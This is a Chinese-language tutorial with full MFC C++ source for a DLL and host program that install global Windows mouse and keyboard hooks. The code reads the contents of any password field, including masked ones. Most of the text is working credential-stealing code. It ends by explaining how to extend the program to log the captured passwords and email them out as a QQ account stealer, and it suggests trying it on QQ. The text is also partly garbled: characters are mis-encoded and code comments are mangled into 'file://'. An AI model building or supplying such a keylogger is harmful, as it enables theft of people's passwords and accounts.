- 相關(guān)推薦
利用鼠標鍵盤鉤子截獲密碼
鉤子能截獲系統(tǒng)并得理發(fā)送給其它應(yīng)用程序的消息,能完成一般程序無法完成的功能。掌握鉤子的編程方法是很有必要的
鉤子分類 :
1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以監(jiān)視發(fā)送到窗口過程的消息
3、WH_DEBUG 調(diào)試鉤子
4、WH_FOREGROUNDIDLE 當當應(yīng)用程序的前臺線程大概要變成空閑狀態(tài)時,系統(tǒng)就會調(diào)用 WH_FOREGROUNDIDL
5、WH_JOURNALRECORD 監(jiān)視和記錄輸入事件
6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD記錄事件
7、WH_KEYBOARD 鍵盤鉤子
9、WH_KEYBOARD_LL 低層鍵盤鉤子
10、WH_MOUSE 鼠標鉤子
11、WH_MOUSE_LL 底層鼠標鉤子
12、WH_SHELL 外殼鉤子
13、WH_MSGFILTER 和 WH_SYSMSGFILTER 使我們可以監(jiān)視菜單,滾動條,消息框等
安裝鉤子:
調(diào)用函數(shù)SetWindowsHookEx安裝鉤子。其函數(shù)原型為:
HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )
idHook表示鉤子類型,它是和鉤子函數(shù)類型一一對應(yīng)的。如,WH_KEYBOARD,WH_MOUSE。
Lpfn是鉤子函數(shù)的地址。
HMod是鉤子函數(shù)所在的實例的句柄。對于線程鉤子,該參數(shù)為NULL;對于系統(tǒng)鉤子,該參數(shù)為鉤子函數(shù)所在的DLL句柄。 (系統(tǒng)鉤子必須在DLL中)
dwThreadId 指定鉤子所監(jiān)視的線程的線程號。對于全局鉤子,該參數(shù)為NULL。
SetWindowsHookEx返回所安裝的鉤子句柄。
卸載鉤子
調(diào)用函數(shù) BOOL UnhookWindowsHookEx( HHOOK hhk)卸載鉤子
定義鉤子函數(shù)
鉤子函數(shù)是一種特殊的回調(diào)函數(shù)。鉤子監(jiān)視的特定事件發(fā)生后,系統(tǒng)會調(diào)用鉤子函數(shù)進行處理。一般為下:
LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)
參數(shù)wParam和 lParam包含所鉤消息的信息,比如鼠標位置、狀態(tài),鍵盤按鍵等。nCode包含有關(guān)消息本身的信,比如是否從消息隊列中移出。
實例:
下面我們通過安裝鼠標鉤子。和鍵盤鉤子還截獲輸入的密碼,并可查看*密碼為例,來說明何何使用鉤子。
1,進入向?qū)В陆∕FC AppWizard(dll) 取名為GetPass,選擇MFC Extension DLL,完成。
2,新建一個CGetPassHook 類,基類:CObject,并加入StartHook,StopHook,函數(shù),如下:
class AFX_EXT_CLASS CGetPassHook : public CObject
{
public:
BOOL StopHook();
BOOL StartHook(HWND hwnd);
CGetPassHook();
virtual ~CGetPassHook();
};
3:加入全局共享數(shù)據(jù),如下:
#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; file://keyboar hook
HHOOK hMouseHook=NULL; file://mouse hook
HINSTANCE glhInstance=NULL; file://globle instance
HWND hOutPutWnd=NULL; file://Display Pass Wnd
#pragma data_seg()
4:加入鼠標,鍵盤鉤子處理函數(shù),如下:
LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)
{ file://鼠標鉤子得理函數(shù)
LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;
if(nCode>=0)
{
HWND hTargetHwnd=lpMouse->hwnd; file://得到鼠標所在窗口句柄
if(hTargetHwnd)
{
LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的樣式
if(style&ES_PASSWORD) file://如果是密碼框
{
char szPass[255];
::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);
file://得到密碼
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);
file://顯示密碼
}
}
}
return CallNextHookEx(hMouseHook,nCode,wParam,lParam);
file://加上這句,就可以繼續(xù)傳遞消息,如果沒有,則會取消此消息的傳遞,
file://可以起到截兒消息的目的,我們這里調(diào)用之。
}
LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)
{ file://keyboard hook proc
if(nCode>=0)
{
HWND hTargetHwnd=GetActiveWindow(); file://get active window
if(hTargetHwnd)
EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚舉所有窗口
}
return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
file://加上這句,就可以繼續(xù)傳遞消息,如果沒有,則會取消此消息的傳遞,
file://可以起到截兒消息的目的,我們這里調(diào)用之。
}
這里要介紹下EnumChildWindows函數(shù),原形如下:
BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam);
hWndParent:為枚舉窗口的句柄
lpEnumFunc:枚舉函數(shù)的地址,
lParam:這里為0
5:加入枚舉窗口的函數(shù)。如下:(注意,因為前面的函數(shù)據(jù)要用到此函數(shù),所以要么在前面聲明,要么放在上面函數(shù)之前定義。
BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)
{ file://enum the child window,find passedit
if(hwnd)
{
LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE
if(style&ES_PASSWORD) file://是密碼框
{
char szPass[255];
::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://顯示
return TRUE;
}
}
return TRUE;
}
6:在DEF文件中定義段屬性: (這步很重要)
SECTIONS
mydata READ WRITE SHARED
7:完成StartHook,StopHook函數(shù),啟動/關(guān)閉鉤子,如下:
BOOL CGetPassHook::StartHook(HWND hwnd)
{ file://install hoook
hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);
file://mouse hook
hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);
file://keyboard hook
if(hMouseHook&&hKeyBoardHook)
{
hOutPutWnd=hwnd; file://顯示密碼的句柄
return TRUE;
}
return FALSE;
}
BOOL CGetPassHook::StopHook()
{ file://unstall hook
BOOL mHook=UnhookWindowsHookEx(hMouseHook);
BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);
if(mHook&&kHook)
return TRUE;
return FALSE;
}
8:在DLLMAIN函數(shù)中得到DLL句柄,要用到glhInstance變量,因此要加入一句,如下:
extern HINSTANCE glhInstance; file://記得這里
extern "C" int APIENTRY
DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
UNREFERENCED_PARAMETER(lpReserved);
if (dwReason == DLL_PROCESS_ATTACH)
{
TRACE0("GETPASS.DLL Initializing!n");
if (!AfxInitExtensionModule(GetPassDLL, hInstance))
return 0;
new CDynLinkLibrary(GetPassDLL);
glhInstance=hInstance; file://得到句柄
}
else if (dwReason == DLL_PROCESS_DETACH)
{
TRACE0("GETPASS.DLL Terminating!n");
AfxTermExtensionModule(GetPassDLL);
}
return 1; // ok
}
9:編譯,完成DLL部分,
下面建立APP部分。如下:
1:新建MFC AppWizard(exe)命名為GetPassWord,并在第一步中選擇Add to Current WorkSpace加入到當前工作區(qū),這樣方便。
2:將剛才的DLL中的GetPass.lib,和GetPassHook.h拷貝APP所在目錄,然后Project->Add to Project-->Files
選擇這兩個文件。
2:在主對話框中,加入一個EDIT,ID 為IDC_EDIT_PASS
3:在CGetPassWordDlg.h中包含GetPassHook.h文件,聲明一個對象。如下:
#include "GetPassHook.h"
class CGetPassWordDlg : public CDialog
{
protected:
CGetPassHook m_hook;
。。。
DECLARE_MESSAGE_MAP()
};
4:在實現(xiàn)文件中:OnInitDialog()中起動HOOK
BOOL CGetPassWordDlg::OnInitDialog()
{
CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);
m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook
return TRUE; // return TRUE unless you set the focus to a control
}
5:加入WM_DESTROY消息,在退出程序時停止HOOK,如下:
void CGetPassWordDlg::OnDestroy()
{
CDialog::OnDestroy();
m_hook.StopHook(); file://stop hook
}
6:將GetPass.dll拷貝到。EXE一個目錄下,
7:編譯,運行.
這樣,你在輸入任何密碼框輸入密碼時,密碼都將截獲。就算鍵盤HOOK失效,移動鼠標到密碼框,也都獲取*號密碼,因為我們安裝兩個HOOK。啟動QQ,輸入密碼,試下看是否已經(jīng)截獲了密碼?將本程序稍做修改,將截獲的密碼輸出到文件,并加入發(fā)送郵件攻能,一個QQ盜號器就做成了。